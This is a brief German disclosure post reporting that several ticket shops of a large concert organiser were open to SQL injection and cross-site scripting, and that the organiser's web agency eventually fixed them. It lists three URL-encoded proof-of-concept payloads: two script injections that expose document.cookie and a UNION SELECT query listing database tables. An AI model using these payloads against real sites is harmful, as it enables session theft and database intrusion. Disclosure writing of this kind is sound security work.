marx.wtf

Veranstaltungsunternehmen

.../search?q=%27%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

?ticket_url=...%22%3E%3C/iframe%3E%3Chr%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

...?filter=2012-05%27%20UNION%20SELECT%201,table_name,3,4...27,28%20FROM%20INFORMATION_SCHEMA.tables%23 Mehrere Ticketshops eines großen Konzertveranstalters waren anfällig für SQL-Injections und XSS. Der Veranstalter selbst reagierte nicht auf E-Mails. Die Internetagentur des Veranstalters hat die Lücken schließlich geschlossen.